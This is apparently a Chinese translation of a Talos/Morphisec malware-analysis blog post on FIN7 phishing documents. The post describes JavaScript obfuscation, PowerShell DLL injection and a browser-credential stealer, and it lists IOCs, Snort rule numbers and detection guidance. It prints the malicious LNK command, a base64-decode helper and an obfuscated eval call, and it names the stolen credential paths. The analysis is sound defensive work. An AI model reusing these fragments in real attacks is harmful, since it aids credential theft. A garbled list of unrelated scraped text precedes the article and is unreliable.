FIN7 组织在新的攻击中使用 JavaScript 和信息窃取程序 DLL 变体

Similar documents
一周威胁综述(8 月 11 日至 8 月 18 日)

IQ

第壹拾篇

一周威胁综述(2 月 2 日至 2 月 9 日)

樣 的 深 不 管 是 怎 樣, 對 方 真 的 要 結 束 同 居 關 係, 真 的 都 會 好 好 講 清 楚 和 溝 通, 傷 害 是 一 定 會 有, 但 不 要 用 到 雙 方 像 敵 人 一 樣, 這 樣 對 雙 方 來 說, 有 什 麼 意 義 存 在 呢?! 因 為 彼 此 之 間

证券期货市场之主要诚信规范

Office Office Office Microsoft Word Office Office Azure Office One Drive 2 app 3 : [5] 3, :, [6]; [5], ; [8], [1], ICTCLAS(Institute of Computing Tech

帝国CMS下在PHP文件中调用数据库类执行SQL语句实例

一周威胁综述(9 月 8 日至 9 月 15 日)

计算机网络实验说明

24 第 3 章 创 建 Access 数 据 库 和 表 3.1 创 建 Access 数 据 库 Access 2003 中 的 数 据 库 属 于 关 系 型 数 据 库, 以.mdb 为 文 件 的 后 缀, 建 立 一 个 数 据 库 的 同 时, 就 创 建 了 数 据 库 中 的 对

Microsoft Word - 功医检测问&答

_tina

第一章行政區域及行政組織

目 录(目录名)

D2 17/10 食 完 早 餐 去 中 山 陵 和 明 孝 陵, 灵 谷 寺 到 景 区 的 巴 士 : 游 1 游 2 游 路 ( 票 价 在 1-2 元 间 ) 三 个 地 点 中 间 凭 门 票 免 费 乘 坐 景 区 小 火 车 往 来 晚 上 有 力 气 的 话 去 夫 子

PowerPoint Presentation

目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目 需 求 和 技 术 方 案 要 求 1

静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo

安全_一周威胁综述0317_博客_简体中文

手册 doc

浪潮集团信息化文案

AVG AntiVirus User Manual

Cisco WebEx Meetings Server 2.6 版常见问题解答

新 星 向 荣 致 青 春 远 方 的 你 来 了, 迎 着 秋 风, 带 着 期 望 而 来 远 方 的 你 来 了, 是 来 赴 一 场 青 春 盛 宴 漫 长 的 告 别, 忘 不 了 亲 人 的 牵 挂 告 别 短 暂 的 狂 欢, 是 为 一 生 的 绵 延 你 骄 纵 的 心 性, 应

1 情 况 综 述 2016 年 3 月, 全 省 公 共 互 联 网 网 络 安 全 状 况 整 体 评 价 为 良 本 月, 我 省 互 联 网 基 础 设 施 运 行 平 稳, 全 省 范 围 内 未 发 生 造 成 重 大 影 响 的 基 础 设 施 运 行 安 全 事 件, 未 发 生 网

!!! #! #!!!!

!!! #! #!

,,,,,,,,,,,, :?,,? ( )??,,??,,?,,? ( )?,?,,? ( ),? 阿 英 夜 半 的 尖 叫 已 经 持 续 了 一 个 月, 她 说 不 知 道 为 什 么 会 这 样, 也 控 制 不 了 听 到 人 家 的 谈 论, 我 很 不 开 心 我 根 本 不 知

目 录 一 重 要 提 示... 3 二 公 司 主 要 财 务 数 据 和 股 东 变 化... 3 三 重 要 事 项... 7 四 附 录 / 25

年 第 期!! %! # # &! #! ( % & 余 牧 人 # 抗 战 八 年 来 的 中 国 教 会 # 基 督 教 丛 刊 第 期 年 月 第 页 参 见 刘 吉 西 等 编 # 四 川 基 督 教 巴 蜀 书 社 年 版 秦 和 平 # 基 督 宗 教 在 西 南 民 族 地 区 的 传

!!!!!!!

会 文 化 的 封 闭 隔 绝 政 治 的 对 立 与 社 会 制 度 的 差 异 迫 使 这 些 大 陆 迁 台 的 外 省 人 # 变 成 了 有 家 归 不 得 的 流 亡 者 与 故 乡 的 一 切 从 此 天 各 一 方 摆 荡 在 新 旧 环 境 的 焦 躁 中 这 些 跋 涉 过 动

# # # # # # #!# # 铏 描 写 的 这 个 故 事 当 然 是 出 于 想 象 # 和 傅 会 # 而 作 为 便 于 讨 论 相 关 问 题 我 们 有 必 要 先! %!! #!!!!!!!!!!!! #!! #! # # 鷟 的 游 仙 窟! 记 叙 其 与 崔 十 娘 五 嫂

壹 前 言 一. 研 究 動 機 學 者 指 出 轉 換 時 期 是 孩 子 飲 食 習 慣 建 立 的 關 鍵 時 期, 若 孩 子 累 積 不 好 得 經 驗, 到 兩 歲 時 可 能 會 出 現 偏 食 情 況 ( 張 雪 惠, ) 嬰 兒 的 副 食 品 是 邁 入 寶 寶

欧 洲 研 究 年 第 期!! # % & # ( ) ( ) % &

!

# % % 狥 名 已 矣 心 斋 王 &

%!!

沦 陷 时 期 北 平 日 伪 的 金 融 体 系 及 掠 夺 手 段!!

( 附 件 一 ) 中 華 民 國 兒 童 教 保 聯 合 總 會 幼 兒 教 育 及 照 顧 法 第 十 八 條 修 正 草 案 建 議 對 照 教 育 部 版 條 文 教 保 服 務 人 員 條 例 第 19 條 草 案 本 法 施 行 前 已 於 私 立 托 兒 所 任 職, 於 本 法 施

中 国 社 会 科 学 年 第 期! % &! % & ( ( ( ( ) ) ( ( ( ( ) + ) (

!!

对 法 理 学 知 识 谱 系 的 一 种 考 察 一 追 求 作 为 客 观 实 体 的 法 律 # # # % & # # ( ) % & % & ( % & % & ) # % & % &

李 自 然 % 试 论 乾 隆 对 回 民 的 政 策 兼 评 李 普 曼 论 大 清 律 例 当 中 的 伊 斯 兰 教 和 穆 斯 林! # # # # #! # # & # # ( # # ) # # # # # & 清 高 宗 实 录 卷 清 高 宗 实 录 卷 ( 清 高 宗 实 录 卷

书 评 :,,,, :,,,,, ( ),, :?,,,, ( ),,, ( ), :,,, :,,?,?,,,,,,,,

,,,,,,,,, (, ),,,,,,,,,,,,,,,,,, (,,,,,, ),,,,,,,, ( ),,, (, ),,,, % %,,,,,, (, )(, ), ( ), ( ) ( ), ( ), ( ) ( ),,,,, ( ),,,

北京农学院2014年就业质量年度报告

欧 洲 研 究 年 第 期! # % # %! #

数 据 库!!

Microsoft PowerPoint - 5-人事室-印手冊用

Microsoft Word - ¼¯±ô¤p«Ä.doc

一 朝 鲜 人 移 居 中 国 东 北 的 过 程 及 主 要 政 治 因 素 关 于 朝 鲜 人 移 居 中 国 东 北 的 过 程 加 利 福 尼 亚 州 立 大 学 教 授 将 移 民 过 程 分 为 个 阶 段 即 第 一 阶 段 是 年 以 前 这 时 期 移 入 中 国 东 北 的 朝

近 代 史 研 究 % 年 第 期! # % # & % % % % % % % %

合 情 合 理 即 是 好 法 # # # # 鸣 珂 劳 远 望 展 纸 托 情 深 世 乱 关 河 隔 旅 怀 岁 月 侵 家 珍 次 第 数 好 句 短 长 吟 清 越 东 山 志 流 风 自 可 钦! 理 要 层 层 觅 情 须 一 往 深 常 存 春 夏 意 不 让 雪 霜 侵 越 石 霄

,,,,, ( ), ;,, ( ), ( ),, ( ), ( ),,,,,,,,,, ( ), (, );,,, (, ),,,,, (, : ) :,,,,, ( ),,,,,,,,,,,,,, ( ),,,,,,,,,,

侵 略 性 是 我 们 称 之 为 自 恋 的 认 同 模 式 的 相 关 倾 向 而 这 种 认 同 模 式 决 定 了 人 的 自 我 以 及 人 的 世 界 特 有 的 实 体 域 的 形 式 结 构


社 会 学 研 究., ( 二 ) 社 会 的 生 产 作 为 独 特 的 转 型 问 题,, :,,,, :,, :,?,?,,, ( ),, (. ) (- ) ( ), (. ) ( )(, ), : +,? 1 ( 三 ) 转 型 社 会 与 转 型 社 会 学 的 使 命,,,,,,, 1

第十二課:出埃及記第三十二章

袁 华 第 四 军 医 大 学 西 京 医 院 琚 芬 第 四 军 医 大 学 西 京 医 院 段 强 第 四 军 医 大 学 西 京 医 院 张 盘 德 佛 山 市 第 一 人 民 医 院 潘 燕 霞 福 建 医 科 大 学 刘

( 六 ) 誰 該 做 佛 事? 50 ( 七 ) 誦 經 做 什 么? 53 ( 八 ) 拜 懺 做 什 么? 56 ( 九 ) 放 焰 口 做 什 么? 58 ( 十 ) 人 鬼 之 間 的 佛 事 60 兩 類 超 度 亡 與 存 ( 一 ) 前 言 64 ( 二 ) 超 度 亡 靈 64 (

目录

事前警告、规范的安全管理机制,事后及时追溯,提高企业安全审计效率

<4D F736F F D C6573ABC8A4E1A8CFA5CEBBA1A9FAAED1>

<%DOC NAME%> User Manual

无类继承.key

1 产 品 简 介 特 性 包 装 产 品 外 观 电 脑 系 统 要 求 硬 件 安 装 软 件 安 装 软 件 操 作 IP

一 专 业 名 称 专 业 名 称 : 会 计 二 入 学 要 求 与 基 本 学 制 入 学 要 求 : 初 中 毕 业 生 基 本 学 制 : 三 年 ; 其 中 前 二 年 为 在 校 学 习 时 间, 最 后 一 年 为 企 业 实 习 时 间 层 次 : 中 职 三 培 养 目 标 本 专

Sunny WebBox、采用 Bluetooth® 的 Sunny WebBox 和 SUNNY PORTAL 中的 SMA Cluster Controller - 用户手册

(Microsoft Word - \244g\246a\247B\244\275\253H\245\365\244\247\275\325\254d\254\343\250s doc)

一 登录 crm Mobile 系统 : 输入 ShijiCare 用户名和密码, 登录系统, 如图所示 : 第 2 页共 32 页

建设工程施工管理(二建)精讲班第22讲课件讲义(环球职业教育在线)

Ioncube Php Encoder 8 3 Crack 4. llamaba octobre traslado General Search colony

Microsoft Word - Enriched TEKLA Curriculum Guide (chi ver)

<4D F736F F D20D1A7C9FACAD6B2E1B8C4D7EED6D5A3A8B4F8B1EDB8F1BCD3D2B3C2EBB0E6A3A9372E3239>

桂林市劳动和社会保障局关于

第三章 維修及管理

Microsoft Word 年度选拔硕博连读研究生的通知.doc

Teamsun (Company News_jrj.com.cn)

範本檔

二 智 慧 財 產 權 宣 導 資 料 三 世 新 大 學 導 師 制 度 實 施 辦 法..37 四 導 生 ( 守 護 神 ) 系 統 使 用 面 說 明 世 新 大 學 推 動 紫 錐 花 運 動 宣 導 資 料. 41 世 新 大 學 無 菸 校 園 實 施 辦

「西醫基層總額支付委員會《第28次委員會議紀錄

标题


北京民办教育信息

院讯第十七期.doc

Microsoft Word 杨局长在2015年度全市卫生工作会议上的讲话.doc

(7月专刊)闵行卫生计生动态2016年第11期_s_.docx

中 央 警 察 大 學 九 十 八 年 警 佐 班 第 二 十 九 期 ( 第 二 類 ) 入 學 考 試 憲 法 題 解 壹 單 一 選 擇 題 : (B) 總 統 依 憲 法 之 規 定, 行 使 締 結 條 約 之 權 關 於 憲 法 所 稱 之 條 約, 以 下 敘 述 何 者 錯 誤?(A

六域链联盟 SDChain-Matrix 节点搭建指南 2018/07/26 Version : 1.0.0

FileMaker 15 WebDirect 指南

中国证券监督管理委员会公告

Microsoft Word - ch02.doc

1 1 大概思路 创建 WebAPI 创建 CrossMainController 并编写 Nuget 安装 microsoft.aspnet.webapi.cors 跨域设置路由 编写 Jquery EasyUI 界面 运行效果 2 创建 WebAPI 创建 WebAPI, 新建 -> 项目 ->

2005 Sun Microsystems, Inc Network Circle, Santa Clara, CA U.S.A. Sun Sun Berkeley BSD UNIX X/Open Company, Ltd. / Sun Sun Microsystems Su

关于建立境内违法互联网站黑名单管理制度的通知

<4D F736F F D20D0C5CFA2BBAFB7A2D5B9D6D8B5E3D7A8CFEEB9E6BBAE2E646F63>

? 這 全 都 是 市 政 府 提 供 給 我 的 資 料 低 底 盤 公 車 計 畫 96 年 預 算 新 台 幣 4,500 萬 元 97 年 預 算 新 台 幣 1 億 6,500 萬 元 98 年 預 算 新 台 幣 3 億 2,300 萬 元, 共 有 307 台 低 底 盤 公 車,99

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP #

Transcription:

2017 年 9 月 27 日, 星期三 FIN7 组织在新的攻击中使用 JavaScript 和信息窃取程序 DLL 变体 作者 :Michael Gorelik 和 Josh Reynolds 执行摘要 本文将详细介绍一个新近发现的遭到 FIN7 组织利用的 RTF 文档系列 FIN7 组织 ( 也称为 Carbanak 团伙 ) 是一个受经济利益驱使, 主要针对金融 酒店和医疗行业发起网络攻击的团伙 FIN7 组织使用这种文档进行网络钓鱼活动, 旨在执行一系列脚本语言代码, 其中采用了多种用于绕过传统安全防护机制的混淆机制及其他高级技术 这种文档包含各种诱使用户点击其嵌入式对象的消息, 而该嵌入式对象可执行一些恶意脚本, 使系统感染上一种用于窃取信息的恶意软件变体 然后, 该恶意软件就会从一些常用浏览器和邮件客户端窃取密码, 并将其发送到攻击者可访问的远程节点 本文将详细探讨这些高级机制和信息窃取恶意软件 我们还将分析面向终端的 AMP 和 Threat Grid 产品系列中用于检测这些文档系列的多种静态和动态检测机制 引言 2017 年 6 月 9 日,Morphisec 实验室发表了一篇博文, 详细介绍一种新型感染媒介技术, 这种技术采用包含嵌入式 JavaScript OLE 对象的 RTF 文档 用户点击该文档后, 它就会启动由 JavaScript 组成的感染链和最终的 shellcode 负载, 然后通过 DNS 从远程命令和控制服务器加载更多的 shellcode 在 Morphisec 实验室和思科研究与效能团队共同撰写的这篇博文中, 我们将揭示这个新的文档变体的详细信息 该变体利用 LNK 嵌入式 OLE 对象, 从文档对象中提取出 JavaScript 僵尸病毒, 并使用 PowerShell 将信息窃取程序 DLL 注入内存中 我们公布的这些详细信息一方面旨在帮助大家了解 FIN7 等老练的犯罪团伙目前采用的攻击方法, 这些团伙不断改变攻击技术, 企图规避安全检测 ; 另一方面旨在展示面向终端的 AMP 和 Threat Grid 产品系列的检测功能 网络威胁始终在不断变化, 每天都会对很多行业产生不利影响, 而本文将有助于大家了解这些威胁 感染媒介 我们遇到的植入程序变体使用 LNK 文件来执行 wscript.exe, 这个 JavaScript 攻击链的开头部分嵌入在以下 word 文档对象中 : C:\Windows\System32\cmd.exe..\..\..\Windows\System32\cmd.exe /C set x=wsc@ript /e:js@cript %HOMEPATH%\md5.txt & echo try{w=getobject("","wor"+"d.application");this[string.fromcharcode(101)+'va'+ 'l'](w.activedocument.shapes(1).textframe.textrange.text);}catch(e){}; >%HOME PATH%\md5.txt & echo %x:@=% cmd

该攻击链包含构成 JavaScript 僵尸病毒各组成部分的大量 base64 编码的 JavaScript 文件 此外, 该攻击链中还包含执行反射式 DLL 注入的 PowerShell 代码, 用于注入信息窃取恶意软件变体 DLL, 这些将在下文进行深入介绍 JAVASCRIPT 比较 对解码后的 JavaScript 函数进行聚类分析 一个此类文档就可以生成多达 40 个 JavaScript 文件 为了识别相似的技术, 我们决定使用给定 JavaScript 文件的熵和 base64 的解码深度, 借助 ggplot 和 ggiraph R 库在散点图中对这些文件进行聚类分析 在阐述分析结果之前, 我们先来解释一下用于对这些 JavaScript 文件进行绘图和聚类分析的值 Base64 编码 大多数 JavaScript 混淆处理都是通过嵌套 base64 编码实现的 Base64 是一种将二进制转换成文本的编码方案, 可用于表示任何类型的数据 对于这些文档而言,Base64 用于对 JavaScript 函数进行多次编码, 很有可能是为了规避传统防病毒软件采用的常见分析技术, 因为这些防病毒软件只能模拟有限次迭代的 JavaScript 指令 这些 base64 blob 采用硬编码或以逗号分隔, 之后将其串接起来进行解码, 就能生成要执行的下一个 JavaScript 代码 解码时, 可以使用 CDO.Message ActiveXObject, 并将 ContentTransferEncoding 指定为 base64 ( 请注意,Windows-1251 字符集是西里尔文, 说明它可能来自使用俄语的国家 / 地区 ): function b64dec(data){ } var cdo = new ActiveXObject("CDO.Message"); var bp = cdo.bodypart; bp.contenttransferencoding = "base64"; bp.charset = "windows-1251"; var st = bp.getencodedcontentstream(); st.writetext(data); st.flush(); st = bp.getdecodedcontentstream(); st.charset = "utf-8"; return st.readtext;

然后, 这可以使用一个经过混淆的函数调用进行评估, 例如 : MyName.getGlct()[String.fromCharCode(101)+'va'+'l'](b64dec(energy)); 执行这些 base64 解码步骤会导致生成 JavaScript 僵尸病毒函数的各个执行分支, 并且将信息窃取程序 DLL 注入到内存中 : 图 1: 采用 JavaScript 和 DLL 注入的文档感染链详情 JavaScript 的熵 熵涉及计算一定量的数据的无序性和不确定性 在本文中, 我们关注的是基于该计算确定提取的 JavaScript 文件之间的关联性, 因为这些文档的变体包含类似的函数, 但由于使用了混淆机制, 因此增加了聚类分析的难度 为此, 我们采用了 Ero Carrera 的博文中提供的 Python 代码进行以下计算 : import math def H(data):

if not data: return 0 entropy = 0 for x in range(256): p_x = float(data.count(chr(x)))/len(data) if p_x > 0: entropy += - p_x*math.log(p_x, 2) return entropy 对每个 JavaScript 文件执行此计算之后, 计算结果将作为下文散点图的 X 轴 聚类分析和 JavaScript 函数的散点图 我们从一组不包含植入程序 DLL 的初始文档开始 然后, 计算出了生成各个文件 (Y 轴 ) 所需的 base64 解码深度, 并计算它们各自的熵 (X 轴 ) 进而, 分析了各个散点图分组, 并将其各自的功能标记为红色 : 图 2: 基于熵和 base64 解码深度的散点图

通过这个散点图, 可以得到下列结论 : 1. base64 解码深度越深, 就越有可能是我们要找的函数 2. 僵尸病毒函数和 C2 通信 JavaScript 位于多组解码深度和熵比较接近的文件中 3. 任务调度功能的解码深度和熵差异比较明显 ( 分两种单独的情况 ) 然后, 我们将相同的技术应用于传送整个 base64 编码压缩 DLL 的第二代文档上 : 图 3:PowerShell DLL 文件的散点图

离群值代表解码后的 DLL 和 XML 任务文件 如果从散点图中移除这些离群值 ( 仅保留 JavaScript), 可以看到与第一代文档相似的簇 : 图 4: 修改后的 PowerShell DLL 文档散点图 基于簇的数量和熵的范围, 我们发现这一代文档包含更多具有不同功能和深度的文件 该绘图方法还提供了一种通过显示离群值来识别新功能的方法, 例如标记 PS 的离群值, 其中存放的是一组经过编码的 PowerShell 字节, 而不是提供用于 DLL 注入的最终 PowerShell 的 blob: 图 5: 根据熵的离群值识别新的 PowerShell 功能

JavaScript 代码混淆的变化 对相似功能进行了聚类分析之后, 生成的文档之间的变化就变得很明显 变量名称和 GUID 路径都发生了变化 : 图 6: 变量和路径 GUID JS 的变化

此功能还使得一种值得关注的混淆机制变得更加显眼, 而一些仿真引擎可能会忽略这种混淆机制 我们所评估的 JavaScript 的函数体似乎位于一个多行注释中, 但实际上这个注释是个多行字符串 我们通过 Chrome 的脚本控制台对此函数进行测试, 发现了以下混淆方法 : 图 7:JavaScript 多行注释字符串混淆方法我们对函数进行重新整理, 可以得出以下结果 : 图 8: 重新整理的函数示例

命令和控制地址发生也经过更改 : 图 9: 更改的命令和控制地址 不同 base64 编码深度可以使用我们的散点图来识别, 如 PowerShell 的写入和执行功能 : 图 10: 具有不同 Base64 解码深度的 PowerShell 写入和执行功能

下面我们看看相同的功能在不同的解码深度下的情形 : 图 11:PowerShell 写入和执行功能的代码比较 信息窃取程序 DLL 恢复 DLL 这些 JavaScript 解码链的最后一个组成部分是 PowerShell 反射式 DLL 注入脚本, 其中包含从 Powersploit 的 Invoke-ReflectivePEInjection 中复制粘贴的函数 DLL 通过解码 base64 blob 来进行去混淆, 并使用 IO.Compression.DeflateStream 解压生成的字节 为了恢复 DLL, 我们可以使用 [io.file] :: WriteAllBytes 直接将解压缩的字节写入磁盘 图 12: 对 PowerShell 流进行解压并将 DLL 写入磁盘

图 13: 复制粘贴的 PowerSploit Invoke-ReflectivePEInjection 代码

信息窃取程序 DLL 功能 我们在 2016 年 8 月写了一篇关于 H1N1 植入程序的博文, 其中引用了一个字符串去混淆脚本来处理多个 32 位值的 XOR ADD 和 SUB 字符串混淆方法 该脚本能够处理此信息窃取程序 DLL 中的类似功能 : 图 14:Firefox 字符串解码 导入散列功能需要解析给定 DLL 的导出表 ( 常用于打包程序 / 恶意软件 ): 图 15:PowerShell 注入的 DLL 散列功能的 PE 偏移量

然后, 我们对给定的导出值使用 XOR 和 ROL 算法以便与要解析的导出表的给定散列值进行比较 : 图 16:PowerShell 注入的 DLL 散列算法 该 DLL 还包含类似数据窃取功能, 比如通过对缓存的 URL 进行散列处理, 使用 CryptUnprotectData 解密 Intelliform 数据 : 图 17:PowerShell 注入的 DLL Intelliform 的数据窃取功能 此二进制文件还包含窃取 Outlook 和 Firefox 数据的功能, 以及从 Google Chrome Chromium 以及 Chromium 和 Opera 浏览器的分叉中窃取登录信息的功能, 这些将在下一部分进一步讨论

窃取 Chrome Chromium 和 Opera 凭证 针对 Chrome Chromium Chromium 分叉和 Opera 浏览器的凭证窃取功能可以打开 [Database Path]\Login Data sqlite3 数据库, 读取 URL 用户名和密码字段, 并调用 CryptUnprotectData 来解密用户密码 它会在以下路径中查找此数据库 :%APPDATA% %PROGRAMDATA% 和 %LOCALAPPDATA%: \Google\Chrome\User Data\Default\Login Data \Chromium\User Data\Default\Login Data \MapleStudio\ChromePlus\User Data\Default\Login Data \YandexBrowse\User Data\Default\Login Data \Nichrom\User Data\Default\Login Data \Comodo\Dragon\User Data\Default\Login Data 虽然 Opera 并非 Chromium 的分叉, 但最新版本的凭证却在以下路径下具有相同的实现方式 :\Opera Software\Opera Stable\Login Data 用于窃取数据的命令和控制代码 除了 JavaScript 僵尸病毒功能之外, 被盗数据将被转储到 %APPDATA%\%USERNAME%.ini, 并将该文件的创建时间设置为 ntdll.dll 的创建时间 该数据通过 SimpleEncrypt 函数进行读取和加密, 通过函数名称可以猜到, 这是一个简单的替换密码函数 : 图 18: 命令和控制数据替换密码函数

然后, 该恶意软件会将其 POST 到硬编码的命令和控制地址, 包括 Google 应该脚本托管服务 ( 我们还注意到了 alfin 变量声明, 它是用于替换密码的字母表 ): 图 19: 命令和控制的数据泄漏 JavaScript 功能 这是在再次使用注释块规避技术 AMP 覆盖范围 面向终端的 AMP 和 Threat Grid 产品系列是处理此威胁的理想选择, 因为它们可以通过同时分析静态和动态活动, 来检测恶意活动

AMP Threat Grid 无需点击文档中嵌入的 OLE 对象,Threat Grid 就可以单凭使用静态属性洞察可能的恶意活动 嵌入式功能由 Threat Grid 自动提取, 在这种情况下, 嵌入式 LNK OLE 对象包含点击时执行的看似恶意的命令 : 图 20: 文档 LNK 命令提示符静态属性 图 21: 活动文档 LNK 静态属性

在 Threat Grid 运行期间, 可以使用 打开 Word 文档中的嵌入对象 手册在文档中点击 OLE 对象, 当我们从提交下拉菜单中选择此方案之后, 它会在 Threat Grid 运行期间自动执行该嵌入对象 : 图 22: 从提交菜单中选择手册 以下是关于这种自动化用户交互的说明 : 图 23: 通过手册点击文档 OLE 对象

我们点击了该文档之后, 系统基于动态行为触发其他行为指标 : 图 24: 点击 OLE 对象引起的动态活动 我们也可以观察到任务创建 ( 由 JavaScript 僵尸病毒用于定期执行组件 ): 图 25: 任务创建动态活动 定期执行的 JavaScript 内容可以在 工件 部分查看, 而且可以下载或重新提交该内容, 以便进一步分析 : 图 26: 写入的 JavaScript 工件对象 然后, 我们将这些情报集成到 AMP 云中, 保护所有客户, 使其免遭类似攻击方法的攻击

面向终端的 AMP 面向终端的 AMP 可通过多种方法观察动态活动 其中一种方法就是捕获命令行参数, 然后将其发送到 AMP 云进行分析 在这种情况下, 我们能够观察点击 OLE 对象后 wscript.exe 的执行情况 : 图 27:AMP 中捕获的命令行参数, 用于分析终端设备轨迹

这触发了一项感染指标, 然后我们可以进一步调查此感染指标 : 图 28: 捕获的命令行参数触发的感染指标 结论 FIN7 组织等攻击者采用高级攻击技术, 对各行各业中使用大多数 Microsoft Windows 版本的传统技术的受害者发起攻击 他们通过使用 Microsoft Word 文档来传播整个恶意软件平台, 可以利用脚本语言来访问 ActiveX 控件, 还可以使用 PowerShell 通过 无文件 方式将运送的可移植可执行文件注入到内存中, 这些可移植可执行文件全程无需接触磁盘 通过对这些 JavaScript 代码进行聚类分析, 我还发现了 FIN7 的不同版本恶意软件之间的细微差别, 而且通过离群值发现了重大变化 通过观察静态和动态属性, 我们可以建立基于嵌入式 OLE 对象的感染指标, 用于识别 FIN7 文档以及可能利用类似功能进行攻击的其他文档, 从而保护我们的客户免受攻击

防护 Talos 发布了以下 Snort 规则来解决这一威胁 请注意,Talos 未来可能会发布更多规则, 当前规则会根据未来得到的更多信息而有所变更 Firepower 客户应更新 SRU, 使用最新的规则集更新 开源 Snort 用户规则集客户可以通过下载最新规则包 ( 可在 Snort.org 上购买 ), 获得最新保护功能 Snort 规则 :44430-44433 以下列出了我们的客户可以检测和阻止这种威胁的其他方式 高级恶意软件防护 (AMP) 解决方案可以有效防止执行威胁发起者使用的恶意软件 CWS 或 WSA Web 扫描功能可以阻止访问恶意网站, 并检测这些攻击中所用的恶意软件 邮件安全设备可以拦截威胁发起者在攻击活动中发出的恶意邮件 网络安全设备 ( 例如 NGFW NGIPS 和 Meraki MX) 可以检测与此威胁相关的恶意活动 AMP Threat Grid 可帮助识别恶意二进制文件, 使所有思科安全产品都有内置保护措施 Umbrella, 我们的安全互联网网关 (SIG), 可阻止用户连接恶意域 IP 和 URL( 无论用户是否位于公司网络上 ) 感染指标 JavaScript 僵尸病毒文档 6bc8770206c5f2bb4079f7583615adeb4076f2e2d0c655fbafedd9669dc3a213 df22408833b2ae58f0d3e2fe87581be31972ef56e0ebf5efafc4e6e0341b5521 2b4991b2a2792436b50404dcf6310ef2af2573505810ebac08e32f17aee3fbbe ebca565e21a42300e19f250f84b927fa3b32debf3fe13003a4aa5b71ed5cbee9 6604d806eb68fdf914dfb6bbf907a4f2bd9b8757fc4da4e7c5e4de141b8d4e2c

使用 PowerShell DLL 注入的 JavaScript 僵尸病毒文档 91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676 ad578311d43d3aea3a5b2908bc6e408b499cc832723225ff915d9a7bc36e0aa4 fadb57aa7a82dbcb2e40c034f52096b63801efc040dd8559a4b8fc873bc962a1 91f028b1ade885bae2e0c6c3be2f3c3dc692830b45d4cf1a070a0bd159f1f676 74a5471c3aa6f9ce0c806e85929c2816ac39082f7fea8dbe8e4e98e986d4be78 f73c7ed3765fec13ffd79aef97de519cfbd6a332e81b8a247fe7d1ccb1946c9c 命令和控制 IP 104[.]232[.]34[.]36 5[.]149[.]253[.]126 185[.]180[.]197[.]20 195[.]54[.]162[.]79 31[.]148[.]219[.]18 Google 应用脚本命令和控制 URL hxxps://script[.]google[.]com/macros/s/akfycbxvggf- QBkaNIWCBFgjohBtkmyfyRpvm91yCGEvzgDvAJdqfW8_/exec hxxps://script[.]google[.]com/macros/s/akfycbz6dmnjfcpwfchoq6wkjsmjqu22sjtj9pxm UeQR7bCpmJhW6Bg2/exec hxxps://script[.]google[.]com/macros/s/akfycbwknc- 8rk0caDWO5I4KMymvOXVinfOpR1eevZ63xiXDvcoqOE6p/exec hxxps://script[.]google[.]com/macros/s/akfycbxyiibw9shufv4s5jm6iwdmvadfortjdm7bzspebf2kpf4in0/exec 发布者 :EDMUND BRUMAGHIN; 发布时间 :13:38 标签 :FIN7 恶意文档 恶意软件 威胁